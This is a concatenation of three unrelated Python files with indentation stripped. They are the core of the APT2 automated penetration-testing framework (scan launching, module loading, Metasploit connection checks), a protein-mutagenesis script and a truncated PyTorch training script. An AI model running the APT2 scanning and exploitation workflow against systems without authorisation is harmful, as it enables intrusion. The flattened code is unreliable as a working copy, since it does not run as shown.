pattern = "'(\d+\.\d+\.\d+[^']*)'"
# # Get the VERSION that exists on Github
# remote = re.search(pattern, self.request('https://raw.githubusercontent.com/moosedojo/apt2/master/VERSION').raw).group(1)
# Get the version that is local
local = re.search(pattern, open('VERSION').read()).group(1)
self.version = local
# if remote != local:
# self.display.alert('Your version of %s does not match the latest release.' % self.progName)
# self.display.alert('Please update or use the \'--no-check\' switch to continue using the old version.')
# if remote.split('.')[0] != local.split('.')[0]:
# self.display.alert('Read the migration notes for pre-requisites before upgrading.')
# self.display.output('Remote version: %s' % (remote))
# self.display.output('Local version: %s' % (local))
# self.cleanup()
except:
self.cleanup()
return
# ----------------------------
# CTRL-C display and exit
# ----------------------------
def ctrlc(self):
self.display.alert("Ctrl-C caught!!!")
self.cleanup()
# ----------------------------
# Close everything down nicely
# ----------------------------
def cleanup(self):
#kill key press thread if it has been set up
if self.keyevent_thread:
self.keyevent_thread.stop()
# kill thread count thread
EventHandler.kill_thread_count_thread()
# fix prompt
os.system("stty echo")
# exit
sys.exit(0)
# ----------------------------
# Display the Banner
# ----------------------------
def displayBanner(self):
self.display.output()
self.display.output(" dM. `MMMMMMMb. MMMMMMMMMM ")
self.display.output(" ,MMb MM `Mb / MM \ ")
self.display.output(" d'YM. MM MM MM ____ ")
self.display.output(" ,P `Mb MM MM MM 6MMMMb ")
self.display.output(" d' YM. MM .M9 MM MM' `Mb ")
self.display.output(" ,P `Mb MMMMMMM9' MM ,MM ")
self.display.output(" d' YM. MM MM ,MM' ")
self.display.output(" ,MMMMMMMMb MM MM ,M' ")
self.display.output(" d' YM. MM MM ,M' ")
self.display.output("_dM_ _dMM_MM_ _MM_MMMMMMMM ")
self.display.output()
self.display.output()
self.display.output("An Automated Penetration Testing Toolkit")
self.display.output("Written by: Adam Compton & Austin Lane")
self.display.output("Verion: %s" % self.version)
# ----------------------------
# Parse CommandLine Parms
# ----------------------------
def parseParameters(self, argv):
parser = argparse.ArgumentParser()
# ==================================================
# Input Files
# ==================================================
filesgroup = parser.add_argument_group('inputs')
filesgroup.add_argument("-C",
metavar="<config.txt>",
dest="config_file",
action='store',
help="config file")
filesgroup.add_argument("-f",
metavar="<input file>",
dest="inputs",
default=[],
action='store',
help="one of more input files seperated by spaces",
nargs='*')
filesgroup.add_argument("--target",
metavar="",
dest="scan_target",
action='store',
help="initial scan target(s)")
# ==================================================
# Advanced Flags
# ==================================================
advgroup = parser.add_argument_group('advanced')
advgroup.add_argument("--ip",
metavar="<local IP>",
dest="lhost",
default=Utils.getIP(),
action='store',
help="defaults to %s" % Utils.getIP())
# ==================================================
# Optional Args
# ==================================================
parser.add_argument("-v", "--verbosity",
dest="verbose",
action='count',
help="increase output verbosity")
parser.add_argument("-s", "--safelevel",
dest="safe_level",
action='store',
default=4,
help="set min safe level for modules. 0 is unsafe and 5 is very safe. Default is 4")
parser.add_argument("-x", "--exclude",
dest="exclude_types",
action="store",
default="",
help="specify a comma seperatec list of module types to exclude from running")
parser.add_argument("-b", "--bypassmenu",
dest="bypass_menu",
action='store_true',
help="bypass menu and run from command line arguments")
# ==================================================
# Misc Flags
# ==================================================
miscgroup = parser.add_argument_group('misc')
miscgroup.add_argument("--listmodules",
dest="list_modules",
action='store_true',
help="list out all current modules and exit")
# parse args
args = parser.parse_args()
# convert parameters to values in the config dict
self.config["config_filename"] = args.config_file
self.config["verbose"] = args.verbose
self.config["list_modules"] = args.list_modules
self.config["scan_target"] = args.scan_target
self.config["safe_level"] = int(args.safe_level)
self.config["exclude_types"] = args.exclude_types
self.config['lhost'] = args.lhost
self.config["bypass_menu"] = args.bypass_menu
for f in args.inputs:
type = self.idFileType(f)
if (type):
if type in self.inputs:
self.inputs[type].append(f)
else:
self.inputs[type] = [f]
# ----------------------------
# Load config setting from the config file
# ----------------------------
def loadConfig(self):
# does config file exist?
if (("config_filename" in self.config) and (self.config["config_filename"] is not None)):
temp1 = self.config
temp2 = Utils.loadConfig(self.config["config_filename"])
self.config = dict(temp2.items() + temp1.items())
else:
# guess not.. so try to load the default one
if Utils.isReadable("default.cfg"):
self.display.verbose("a CONFIG FILE was not specified... defaulting to [default.cfg]")
temp1 = self.config
temp2 = Utils.loadConfig("default.cfg")
self.config = dict(temp2.items() + temp1.items())
else:
# someone must have removed it!
self.display.error("a CONFIG FILE was not specified...")
self.cleanup()
# set verbosity/debug level
if ("verbose" in self.config):
if (self.config['verbose'] >= 1):
self.display.enableVerbose()
if (self.config['verbose'] > 1):
self.display.enableDebug()
if ((self.config["lhost"] == None) or (self.config["lhost"] == "")):
self.display.error("No IP was able to be determined and one was not provided.")
self.display.error("Please specify one via the [--ip <ip>] argument.")
self.cleanup()
# ----------------------------
# Load Initial Events
# ----------------------------
def populateInitEvents(self):
EventHandler.fire("always:initial")
# ----------------------------
# look for and load and modules (input/action)
# ----------------------------
def loadModules(self):
module_dict = {}
# crawl the module directory and build the module tree
# process inputs
path = os.path.join(sys.path[0], 'modules/input')
for dirpath, dirnames, filenames in os.walk(path):
# remove hidden files and directories
filenames = [f for f in filenames if not f[0] == '.']
dirnames[:] = [d for d in dirnames if not d[0] == '.']
if len(filenames) > 0:
for filename in [f for f in filenames if (f.endswith('.py') and not f == "__init__.py")]:
module = self.loadModule("input", dirpath, filename)
if module is not None:
module_dict[module['name'].rstrip(" ")] = module
# process actions
path = os.path.join(sys.path[0], 'modules/action')
for dirpath, dirnames, filenames in os.walk(path):
# remove hidden files and directories
filenames = [f for f in filenames if not f[0] == '.']
dirnames[:] = [d for d in dirnames if not d[0] == '.']
if len(filenames) > 0:
for filename in [f for f in filenames if (f.endswith('.py') and not f == "__init__.py")]:
module = self.loadModule("action", dirpath, filename)
if module is not None:
module_dict[module['name'].rstrip(" ")] = module
# process reports
path = os.path.join(sys.path[0], 'modules/report')
for dirpath, dirnames, filenames in os.walk(path):
# remove hidden files and directories
filenames = [f for f in filenames if not f[0] == '.']
dirnames[:] = [d for d in dirnames if not d[0] == '.']
if len(filenames) > 0:
for filename in [f for f in filenames if (f.endswith('.py') and not f == "__init__.py")]:
module = self.loadModule("report", dirpath, filename)
if module is not None:
module_dict[module['name'].rstrip(" ")] = module
return module_dict
# ----------------------------
# check to see if the module is of an exclude module type
# ----------------------------
def checkExcludeTypes(self, types):
for t in types:
for T in self.config["exclude_types"].split(','):
if t == T:
return True
return False
# ----------------------------
# load each module
# ----------------------------
def loadModule(self, type, dirpath, filename):
module_dict = {}
mod_name = filename.split('.')[0]
mod_dispname = '/'.join(re.split('/modules/' + type + "/", dirpath)[-1].split('/') + [mod_name])
mod_loadname = mod_dispname.replace('/', '_')
mod_loadpath = os.path.join(dirpath, filename)
mod_file = open(mod_loadpath)
try:
# import the module into memory
imp.load_source(mod_loadname, mod_loadpath, mod_file)
# find the module and make an instace of it
_module = __import__(mod_loadname)
_class = getattr(_module, mod_name)
_instance = _class(self.config, self.display, self.modulelock)
reasons = []
valid = True
for r in _instance.getRequirements():
if r == 'disable':
reasons.append("Module Manually Disabled !!!")
elif not r in self.config:
path = Utils.validateExecutable(r)
if path:
self.config[r] = path
else:
reasons.append("Requirement not met: %s" % r)
valid = False
if valid:
module_dict = {'name': mod_name.ljust(25),
'description': _instance.getTitle().ljust(40),
'type': type.ljust(6),
'valid': True}
else:
module_dict = {'name': mod_name.ljust(25),
'description': _instance.getTitle().ljust(40),
'type': type.ljust(6),
'valid': False}
if type == 'action':
module_dict['safelevel'] = _instance.getSafeLevel()
else:
module_dict['safelevel'] = None
# add the module to the framework's loaded modules
if valid:
if type == "action":
if self.config["safe_level"] > _instance.getSafeLevel():
reasons.append("Safety_Level (%i) is below requirement: %i" % (_instance.getSafeLevel(), self.config["safe_level"]))
#self.display.error(
# 'Module \'%s\' disabled. Safety_level (%i) is below specified requirement (%i)' % (
# mod_name, _instance.getSafeLevel(), self.config["safe_level"]))
elif self.checkExcludeTypes(_instance.getTypes()) == True:
True
#self.display.error(
# 'Module \'%s\' disabled. One or more of the following module types were excluded %s' % (
# mod_name, _instance.getTypes()))
else:
self.actionModules[mod_dispname] = _instance
for t in _instance.getTriggers():
EventHandler.add(_instance, t)
elif type == "input":
self.inputModules[mod_dispname] = _instance
elif type == "report":
self.reportModules[mod_dispname] = _instance
#else:
# self.display.error(
# 'Module \'%s\' disabled. Dependency required: \'%s\'' % (mod_name, _instance.getRequirements()))
if reasons:
self.display.error('Module \'%s\' disabled:' % mod_name)
for r in reasons:
self.display.error(' ' + r)
except ImportError as e:
# notify the user of missing dependencies
self.display.error('Module \'%s\' disabled. Dependency required: \'%s\'' % (mod_name, e))
return None
except Exception as e:
# notify the user of errors
print e
self.display.error('Module \'%s\' disabled.' % (mod_name))
return None
return module_dict
# ----------------------------
# Attempt to identify the type of input file
# ----------------------------
def idFileType(self, filename):
# load and read first 4096 bytes of file
file = open(filename, 'rb')
data = file.read(4086)
# get first line of of the 4096 bytes
firstline = data.split('\n', 1)[0]
# check firstline
if (firstline.find("<NeXposeSimpleXML") != -1):
return "nexpose_simple"
elif (firstline.find("<NexposeReport") != -1):
return "nexpose"
elif (firstline.find("<NessusClientData>") != -1):
return "nessus"
elif (firstline.find("<?xml") != -1):
# it's xml, check for root tags we can handle
for line in data.split('\n'):
parts = re.findall("<([a-zA-Z0-9\-\_]+)[ >]", line)
for part in parts:
if part == "nmaprun":
return "nmap"
return ""
# ----------------------------
# Main Menu
# ----------------------------
def displayMenu(self):
if (self.config["bypass_menu"]):
self.runScan() # Skip first trip through menu and go straight into a scan using whatever arguments were
# passed
self.isRunning = False
return
# fix prompt, sometimes input disappears
os.system("stty echo")
self.display.output()
self.display.output("---------------------------------------")
self.display.output()
self.display.output("1. Run")
self.display.output("2. NMAP Settings")
self.display.output("3. Browse KB")
self.display.output("4. Quit")
self.display.output()
try:
userChoice = int(self.display.input("Select an option: "))
print "[" + str(userChoice) + "]"
if (userChoice == 1):
# Execute scan and begin process
self.runScan()
elif (userChoice == 2):
# Configure NMAP Scan Settings
self.displayNmapMenu()
elif (userChoice == 3):
# Browse data in the KB
self.displayKbMenu()
elif (userChoice == 4):
# Quit
self.isRunning = False
else:
self.display.error("%s - Not a valid option" % (userChoice))
except ValueError:
self.display.error("Not a valid option")
# ----------------------------
# Begin a Scan
# ----------------------------
def runScan(self):
if (self.config["scan_target"]):
nm = mynmap(self.config, self.display)
nm.run(target=self.config["scan_target"], ports=self.config["scan_port_range"],
flags="-s" + self.config["scan_type"] + " " + self.config["scan_flags"], vector="nmapScan", filetag="nmapScan" + self.config["scan_target"])
elif (self.config["scan_target_list"]):
nm = mynmap(self.config, self.display)
nm.run(target="", ports=self.config["scan_port_range"],
flags="-s" + self.config["scan_type"] + " " + self.config["scan_flags"] + " -iL " + self.config[
"scan_target_list"], vector="nmapScan")
# begin main loop
self.keyevent_thread = KeyEventThread(self.display)
self.keyevent_thread.start()
while not EventHandler.finished() or not self.allFinished:
if (EventHandler.finished() and not self.allFinished):
EventHandler.fire("allFinished")
self.allFinished = True
if not self.keyevent_thread.isPaused():
EventHandler.processNext(self.display, int(self.config['max_modulethreads']))
# kb.save(self.kbSaveFile)
#scan is done, stop checking for keypresses in case we go back to the menu
self.keyevent_thread.stop()
# ----------------------------
# Configure NMAP Scan Settings
# ----------------------------
def displayNmapMenu(self):
while True:
self.display.output()
self.display.output("---------------------------------------")
self.display.output()
self.display.output("Current NMAP Settings: ")
self.display.output("Scan Type: %s" % (self.config["scan_type"]))
self.display.output("Flags: %s" % (self.config["scan_flags"]))
self.display.output("Port Range: %s" % (self.config["scan_port_range"]))
self.display.output("Target: %s" % (self.config["scan_target"]))
self.display.output("Target List: %s" % (self.config["scan_target_list"]))
self.display.output("Set: (s)can type, extra (f)lags, (p)ort range, (t)arget, target (l)ist, (m)ain menu")
self.display.output()
userChoice = self.display.input("Choose An Option: ")
if userChoice == "s":
self.config["scan_type"] = self.display.input("Choose S, T, U, ST, SU, TU: ")
elif userChoice == "f":
self.config["scan_flags"] = self.display.input("Set Extra Flags (ex: -A -Pn -T4): ")
elif userChoice == "p":
self.config["scan_port_range"] = self.display.input("Enter Range (1-65535): ")
elif userChoice == "t":
self.config["scan_target"] = self.display.input("Enter Target or Range (X.X.X.X/Y): ")
self.config["scan_target_list"] = None
elif userChoice == "l":
filePath = self.display.input("Enter File Path (/tmp/targets.txt): ")
if Utils.isReadable(filePath):
self.config["scan_target"] = None
self.config["scan_target_list"] = filePath
else:
self.display.error("Unable to read file")
elif userChoice == "m":
break
else:
self.display.error("%s - Not a valid option" % (userChoice))
# ----------------------------
# Browse Knowledgebase
# ----------------------------
def displayKbMenu(self):
searchString = ""
depth = 0
searches = {0: ""}
self.display.output()
self.display.output("---------------------------------------")
self.display.output("Browse Knowledgebase")
results = {}
while True:
self.display.output("[ " + searchString + " ]")
if (searchString != ""):
results = kb.get(searchString)
i = 0
for option in results:
self.display.output(str(i) + ". " + option)
i += 1
else:
self.display.output()
self.display.output("0. host")
self.display.output("1. service")
self.display.output("2. domain")
results = ["host", "service", "domain"]
i = 3 # Keep selection filter from breaking
self.display.output()
self.display.output(
"Choose From Above Or: (a)dd, (d)elete, (b)ack, (m)ain menu, (i)mport, write to (t)emp file")
self.display.output()
search = self.display.input("Select option or enter custom search path: ")
if search == "m":
break
elif search == "b":
if depth > 0:
depth -= 1
searchString = searches[depth]
elif search == "a":
text = self.display.input("Input new record: ")
kb.add(searchString + "/" + text.replace("/", "|"))
elif search == "d":
choice = self.display.input("Choose record to remove: ")
try:
if int(choice) in range(i):
kb.rm(searchString + "/" + results[int(choice)])
else:
self.display.error("%s - Not a valid option" % (choice))
except ValueError:
self.display.error("Not a valid option")
elif search == "i":
self.display.error("Not implemented yet")
elif search == "t":
tempPath = self.config["tmpDir"] + "KBRESULTS-" + Utils.getRandStr(10) + ".txt"
text = ""
for line in results:
text = text + line + "\n"
Utils.writeFile(text, tempPath)
self.display.output("Results written to: %s" % (tempPath))
elif re.match("([a-zA-Z0-9.\*]*/)+([a-zA-Z0-9.\*]*)", search) != None:
# Input in form of a/b/c/d, search keystore
searchString = search
depth = 0
searches[depth] = searchString
else:
try:
if int(search) in range(i):
if searchString == "":
searchString = results[int(search)]
else:
searchString = searchString + "/" + results[int(search)]
depth += 1
searches[depth] = searchString
else:
self.display.error("%s - Not a valid option" % (search))
except ValueError:
self.display.error("%s - Not a valid option" % (search))
def msfCheck(self):
"""Test to see if we can connect to the Metasploit msgrpc interface"""
msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
password=self.config['msfpass'])
if not msf.isAuthenticated():
self.display.error(
"Could not connect to Metasploit msgrpc service with the following parameters:")
self.display.error(" host = [%s]" % (self.config['msfhost']))
self.display.error(" port = [%s]" % (self.config['msfport']))
self.display.error(" user = [%s]" % (self.config['msfuser']))
self.display.error(" password = [%s]" % (self.config['msfpass']))
self.display.alert(
"If you wish to make use of Metasploit modules within APT2, please update the config file with the "
"appropiate settings.")
self.display.error("Connect by launching msfconsole and then issue the following command:")
self.display.error(" load msgrpc User=" + self.config['msfuser'] + " Pass=" + self.config['msfpass'] + " ServerPort=" + self.config['msfport'])
self.display.output()
def modulesLoaded(self):
"""Print Loaded Module Stats"""
self.display.output("Input Modules Loaded:\t%i" % len(self.inputModules))
self.display.output("Action Modules Loaded:\t%i" % len(self.actionModules))
self.display.output("Report Modules Loaded:\t%i" % len(self.reportModules))
def additionalInfo(self):
"""Print Additional Information such as knowledge base path and current IP address"""
self.display.output()
self.display.alert("The KnowledgeBase will be auto saved to : %s" % self.kbSaveFile)
self.display.alert("Local IP is set to : %s" % self.config['lhost'])
self.display.alert(
" If you would rather use a different IP, then specify it via the [--ip <ip>] argument.")
# ==========================================================================================
# ==========================================================================================
# ==========================================================================================
# ----------------------------
# Primary METHOD
# ----------------------------
def run(self, argv):
#os.system('clear')
self.parseParameters(argv)
self.versionCheck() #check the local version against the remote version
self.displayBanner() #Print banner first and all messages after
self.loadConfig() # load config
modules_dict = self.loadModules() # load input/action modules
self.modulesLoaded()
if self.config["list_modules"]:
self.display.printModuleList(modules_dict)
sys.exit()
self.additionalInfo()
self.msfCheck()
# parse inputs
for input in self.inputs.keys():
for inputmodule in self.inputModules.keys():
_instance = self.inputModules[inputmodule]
if _instance.getType() == input:
for file in self.inputs[input]:
self.display.verbose("Loading [%s] with [%s]" % (file, inputmodule))
_instance.go(file)
# populate any initial events
self.populateInitEvents()
# begin menu loop
self.threadcount_thread = Thread(target=EventHandler.print_thread_count, args=(self.display,))
self.threadcount_thread.start()
while self.isRunning:
self.displayMenu()
kb.save(self.kbSaveFile)
# generate reports
self.display.output("Generating Reports")
for reportmodule in self.reportModules.keys():
_instance = self.reportModules[reportmodule]
_instance.process()
self.display.output()
self.display.output("Good Bye!")
self.cleanup()
|
mutate_pdb.py | from pmx import Model
from pmx.rotamer import load_bbdep
import argparse
import os
from helper import map_atom_string
from pmx.library import _aacids_dic
from pmx.rotamer import get_rotamers, select_best_rotamer
from os.path import basename
from multiprocessing import Process
# Argument parsers
def parse_args():
parser = argparse.ArgumentParser(description="Performs saturated mutagenesis given a PDB file")
# main required arguments
parser.add_argument("-i", "--input", required=True, help="Include PDB file's path")
parser.add_argument("-p", "--position", required=True, nargs="+",
help="Include one or more chain IDs and positions -> Chain ID:position")
parser.add_argument("-m", "--multiple", required=False, action="store_true",
help="if you want to mutate 2 residue in the same pdb")
parser.add_argument("-hy", "--hydrogen", required=False, action="store_false", help="leave it to default")
parser.add_argument("-pd", "--pdb_dir", required=False, default="pdb_files",
help="The name for the mutated pdb folder")
parser.add_argument("-co", "--consecutive", required=False, action="store_true",
help="Consecutively mutate the PDB file for several rounds")
# arguments = vars(parser.parse_args())
args = parser.parse_args()
return args.input, args.position, args.hydrogen, args.multiple, args.pdb_dir, args.consecutive
class Mutagenesis:
"""
To perform mutations on PDB files
"""
def __init__(self, model, position, folder="pdb_files", consec=False):
"""
Initialize the Mutagenesis object
Parameters
___________
model: str
path to the PDB file
position: str
chain ID:position of the residue, for example A:132
folder: str
The folder where the pdbs are written
consec: bool
If this is the second round of mutation
"""
self.model = Model(model)
self.input = model
self.coords = position
self.rotamers = load_bbdep()
self.residues = ['ALA', 'CYS', 'GLU', 'ASP', 'GLY', 'PHE', 'ILE', 'HIS', 'LYS', 'MET', 'LEU', 'ASN', 'GLN',
'PRO', 'SER', 'ARG', 'THR', 'TRP', 'VAL', 'TYR']
self.final_pdbs = []
self.chain = None
self.position = None
self._invert_aa = {v: k for k, v in _aacids_dic.items()}
self.folder = folder
self.chain_id = None
self.consec = consec
def mutate(self, residue, new_aa, bbdep, hydrogens=True):
"""
Mutate the wild type residue to a new residue
Parameters
___________
residue: pmx object
The residue has to be a pmx object
new_aa: str
A 3 letter or 1 letter code to represent the new residue
bbdep:
A database that can be interpreted by pmx
hydrogens: bool, optional
A boolean, leave it to True because False cause problems with cysteine
"""
if len(new_aa) == 1:
new_aa = _aacids_dic[new_aa]
phi = residue.get_phi()
psi = residue.get_psi()
rotamers = get_rotamers(bbdep, new_aa, phi, psi, residue=residue, full=True, hydrogens=hydrogens)
new_r = select_best_rotamer(self.model, rotamers)
self.model.replace_residue(residue, new_r)
def _check_coords(self):
"""
map the user coordinates with pmx coordinates
"""
if not os.path.exists(self.folder):
os.makedirs(self.folder)
if not os.path.exists("{}/original.pdb".format(self.folder)):
self.model.write("{}/original.pdb".format(self.folder))
self.final_pdbs.append("{}/original.pdb".format(self.folder))
if self.consec:
self.final_pdbs.remove("{}/original.pdb")
after = map_atom_string(self.coords, self.input, "{}/original.pdb".format(self.folder))
self.chain_id = after.split(":")[0]
self.position = int(after.split(":")[1]) - 1
for chain_ in self.model.chains:
if chain_.id == self.chain_id:
self.chain = chain_
def saturated_mutagenesis(self, hydrogens=True):
"""
Generate all the other 19 mutations
Parameters
___________
hydrogens: bool, optional
Leave it true since it removes hydrogens (mostly unnecessary) but creates an error for CYS
mode: 0/1, optional
Acts as a switch, 0 if only 1 mutation per PDB, 1 if 2 mutations per PDB
Returns
_______
final_pdbs: list[path]
A list of the new files
"""
self._check_coords()
aa_init_resname = self.chain.residues[self.position].resname
aa_name = self._invert_aa[aa_init_resname]
for new_aa in self.residues:
if new_aa != aa_init_resname:
self.mutate(self.chain.residues[self.position], new_aa, self.rotamers, hydrogens=hydrogens)
# writing into a pdb
if self.consec:
name = basename(self.input).replace("pdb", "")
output = "{}_{}{}{}.pdb".format(name, aa_name, self.position + 1, self._invert_aa[new_aa])
else:
output = "{}{}{}.pdb".format(aa_name, self.position + 1, self._invert_aa[new_aa])
self.model.write("{}/{}".format(self.folder, output))
self.final_pdbs.append("{}/{}".format(self.folder, output))
return self.final_pdbs
def single_mutagenesis(self, new_aa, hydrogens=True):
"""
Create single mutations
Parameters
___________
new_aa: str
The aa to mutate to, in 3 letter code or 1 letter code
hydrogens: bool, optional
Leave it true since it removes hydrogens (mostly unnecessary) but creates an error for CYS
mode: 0/1, optional
0 if it is just 1 mutation per PDB, 1 if there are more than one mutations
Returns
______
file_: str
The name of the new pdb file
"""
self._check_coords()
aa_init_resname = self.chain.residues[self.position].resname
aa_name = self._invert_aa[aa_init_resname]
self.mutate(self.chain.residues[self.position], new_aa, self.rotamers, hydrogens=hydrogens)
# writing into a pdb
if len(new_aa) == 1:
new = new_aa
elif self._invert_aa.get(new_aa):
new = self._invert_aa[new_aa]
else:
raise Exception("Aminoacid not recognized")
if self.consec:
name = basename(self.input).replace("pdb", "")
output = "{}_{}{}{}.pdb".format(name, aa_name, self.position + 1, new)
else:
output = "{}{}{}.pdb".format(aa_name, self.position + 1, new)
file_ = "{}/{}".format(self.folder, output)
self.model.write(file_)
self.insert_atomtype(file_)
return file_
def insert_atomtype(self, prep_pdb):
"""
modifies the pmx PDB files to include the atom type
Parameters
___________
prep_pdb: path
PDB files to modify
"""
# read in user input
with open(self.input, "r") as initial:
initial_lines = initial.readlines()
# read in preprocessed input
with open(prep_pdb, "r") as prep:
prep_lines = prep.readlines()
for ind, line in enumerate(prep_lines):
if (line.startswith("HETATM") or line.startswith("ATOM")) and (
line[21].strip() != self.chain_id.strip() or line[
22:26].strip() != str(self.position + 1)):
coords = line[30:54].split()
for linex in initial_lines:
if linex[30:54].split() == coords:
prep_lines[ind] = line.strip("\n") + linex[66:81]
break
elif (line.startswith("HETATM") or line.startswith("ATOM")) and line[
21].strip() == self.chain_id.strip() and line[
22:26].strip() == str(self.position + 1):
atom_name = line[12:16].strip()
if atom_name[0].isalpha():
atom_type = " {} \n".format(atom_name[0])
else:
atom_type = " {} \n".format(atom_name[1])
prep_lines[ind] = line.strip("\n") + atom_type
# rewrittes the files now with the atom type
with open(prep_pdb, "w") as prep:
prep.writelines(prep_lines)
def accelerated_insert(self, file_list=None):
"""
Paralelizes the insert atomtype function
Parameters
___________
file_list: list[path]
optional if you want to include another list
"""
pros = []
if file_list:
self.final_pdbs = file_list
for prep_pdb in self.final_pdbs:
p = Process(target=self.insert_atomtype, args=(prep_pdb,))
p.start()
pros.append(p)
for p in pros:
p.join()
def generate_mutations(input_, position, hydrogens=True, multiple=False, folder="pdb_files", consec=False):
"""
To generate up to 2 mutations per pdb
Parameters
___________
input_: str
Input pdb to be used to generate the mutations
position: list[str]
[chain ID:position] of the residue, for example [A:139,..]
hydrogens: bool, optional
Leave it true since it removes hydrogens (mostly unnecessary) but creates an error for CYS
multiple: bool, optional
Specify if to mutate 2 positions at the same pdb
folder: str, optional
The name of the folder where the new PDb files will be stored
consec: bool, optional
Consecutively mutate the PDB file for several rounds
Returns
________
pdbs: list[paths]
The list of all generated pdbs' path
"""
pdbs = []
# Perform single saturated mutations
for mutation in position:
run = Mutagenesis(input_, mutation, folder, consec)
final_pdbs = run.saturated_mutagenesis(hydrogens=hydrogens)
pdbs.extend(final_pdbs)
run.accelerated_insert()
# Mutate in a second position for each of the single mutations
if multiple and len(position) == 2:
for files in final_pdbs:
name = basename(files).replace(".pdb", "")
if name != "original.pdb":
run_ = Mutagenesis(files, position[1], folder, consec)
final_pdbs_2 = run_.saturated_mutagenesis(hydrogens=hydrogens)
pdbs.extend(final_pdbs_2)
run_.accelerated_insert()
return pdbs
def main():
input_, position, hydrogen, multiple, folder, consec = parse_args()
output = generate_mutations(input_, position, hydrogen, multiple, folder, consec)
return output
if __name__ == "__main__":
# Run this if this file is executed from command line but not if is imported as API
all_pdbs = main()
|
train.py | #!/usr/bin/env python
import os
import json
import torch
import numpy as np
import queue
import pprint
import random
import argparse
import importlib
import threading
import traceback
import torch.distributed as dist
import torch.multiprocessing as mp
from tqdm import tqdm
from torch.multiprocessing import Process, Queue, Pool
from core.dbs import datasets
from core.utils import stdout_to_tqdm
from core.config import SystemConfig
from core.sample import data_sampling_func
from core.nnet.py_factory import NetworkFactory
from tensorboardX import SummaryWriter
writer = SummaryWriter('tensorboard/1_continue')
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
def parse_args():
parser = argparse.ArgumentParser(description="Training Script")
parser.add_argument("cfg_file", help="config file", type=str)
parser.add_argument("--iter", dest="start_iter",
help="train at iteration i",
default=0, type=int)
parser.add_argument("--workers", default=1, type=int)
parser.add_argument("--initialize", action="store_true")
parser.add_argument("--distributed", action="store_true")
parser.add_argument("--world-size", default=-1, type=int,
help="number of nodes of distributed training")
parser.add_argument("--rank", default=0, type=int,
help="node rank for distributed training")
parser.add_argument("--dist-url", default=None, type=str,
help="url used to set up distributed training")
parser.add_argument("--dist-backend", default="nccl", type=str)
args = parser.parse_args()
return args
def prefetch_data(system_config, db, queue, sample_data, data_aug):
ind = 0
print("start prefetching data...")
np.random.seed(os.getpid())
while True:
try:
data, ind = sample_data(system_config, db, ind, data_aug=data_aug)
queue.put(data)
except Exception as e:
traceback.print_exc()
raise e
def _pin_memory(ts):
if type(ts) is list:
return [t.pin_memory() for t in ts]
return ts.pin_memory()
def pin_memory(data_queue, pinned_data_queue, sema):
while True:
data = data_queue.get()
data["xs"] = [_pin_memory(x) for x in data["xs"]]
data["ys"] = [_pin_memory(y) for y in data["ys"]]
pinned_data_queue.put(data)
if sema.acquire(blocking=False):
return
def init_parallel_jobs(system_config, dbs, queue, fn, data_aug):
tasks = [Process(target=prefetch_data, args=(system_config, db, queue, fn, data_aug)) for db in dbs]
for task in tasks:
task.daemon = True
task.start()
return tasks
def terminate_tasks(tasks):
for task in tasks:
task.terminate()
def train(training_dbs, validation_db, system_config, model, args):
global previous
# reading arguments from command
start_iter = args.start_iter
distributed = args.distributed
world_size = args.world_size
initialize = args.initialize
gpu = args.gpu
rank = args.rank
# reading arguments from json file
batch_size = system_config.batch_size
learning_rate = system_config.learning_rate
max_iteration = system_config.max_iter
pretrained_model = system_config.pretrain
stepsize = system_config.stepsize
snapshot = system_config.snapshot
val_iter = system_config.val_iter
display = system_config.display
decay_rate = system_config.decay_rate
stepsize = system_config.stepsize
print("Process {}: building model...".format(rank))
nnet = NetworkFactory(system_config, model, distributed=distributed, gpu=gpu)
if initialize:
nnet.save_params(0)
exit(0)
# queues storing data for training
training_queue = Queue(system_config.prefetch_size)
validation_queue = Queue(5)
# queues storing pinned data for training
pinned_training_queue = queue.Queue(system_config.prefetch_size)
pinned_validation_queue = queue.Queue(5)
# allocating resources for parallel reading
training_tasks = init_parallel_jobs(system_config, training_dbs, training_queue, data_sampling_func, True)
if val_iter:
validation_tasks = init_parallel_jobs(system_config, [validation_db], validation_queue, data_sampling_func, False)
training_pin_semaphore = threading.Semaphore()
validation_pin_semaphore = threading.Semaphore()
training_pin_semaphore.acquire()
validation_pin_semaphore.acquire()
training_pin_args = (training_queue, pinned_training_queue, training_pin_semaphore)
training_pin_thread = threading.Thread(target=pin_memory, args=training_pin_args)
training_pin_thread.daemon = True
training_pin_thread.start()
validation_pin_args = (validation_queue, pinned_validation_queue, validation_pin_semaphore)
validation_pin_thread = threading.Thread(target=pin_memory, args=validation_pin_args)
validation_pin_thread.daemon = True
validation_pin_thread.start()
if pretrained_model is not None:
if not os.path.exists(pretrained_model):
raise ValueError("pretrained model does not exist")
print("Process {}: loading from pretrained model".format(rank))
nnet.load_pretrained_params(pretrained_model)
if start_iter:
nnet.load_params(start_iter)
learning_rate /= (decay_rate ** (start_iter // stepsize))
nnet.set_lr(learning_rate)
print("Process {}: training starts from iteration {} with learning_rate {}".format(rank, start_iter + 1, learning_rate))
else:
nnet.set_lr(learning_rate)
if rank == 0:
print("training start...")
nnet.cuda()
nnet.train_mode()
with stdout_to_tqdm() as save_stdout:
for iteration in tqdm(range(start_iter + 1, max_iteration + 1), file=save_stdout, ncols=80):
training = pinned_training_queue.get(block=True)
training_loss = nnet.train(**training)
if display and iteration % display == 0:
print("Process {}: training loss at iteration {}: {}".format(rank, iteration, training_loss.item()))
writer.add_scalar('myscalar_train', training_loss.item(), iteration)
del training_loss
if val_iter and validation_db.db_inds.size and iteration % val_iter == 0:
nnet.eval_mode()
validation = pinned_validation_queue.get(block=True)
validation_loss = nnet.validate(**validation)
if validation_loss.item() < previous:
previous = validation_loss.item()
nnet.save_params_best()
print("Process {}: validation loss at iteration {}: {}".format(rank, iteration, validation_loss.item()))
writer.add_scalar('myscalar_val', validation_loss.item(), iteration)
nnet.train_mode()
if iteration % snapshot == 0 and rank == 0:
nnet.save_params(iteration)
if iteration % stepsize == 0:
learning_rate /= decay_rate
nnet.set_lr(learning_rate)
# sending signal to kill the thread
training_pin_semaphore.release()
validation_pin_semaphore.release()
# terminating data fetching processes
terminate_tasks(training_tasks)
terminate_tasks(validation_tasks)
def main(gpu, ngpus_per_node, args):
args.gpu = gpu
if args.distributed:
args.rank = args.rank * ngpus_per_node + gpu
dist.init_process_group(backend=args.dist_backend, init_method=args.dist_url,
world_size=args.world_size, rank=args.rank)
rank = args.rank
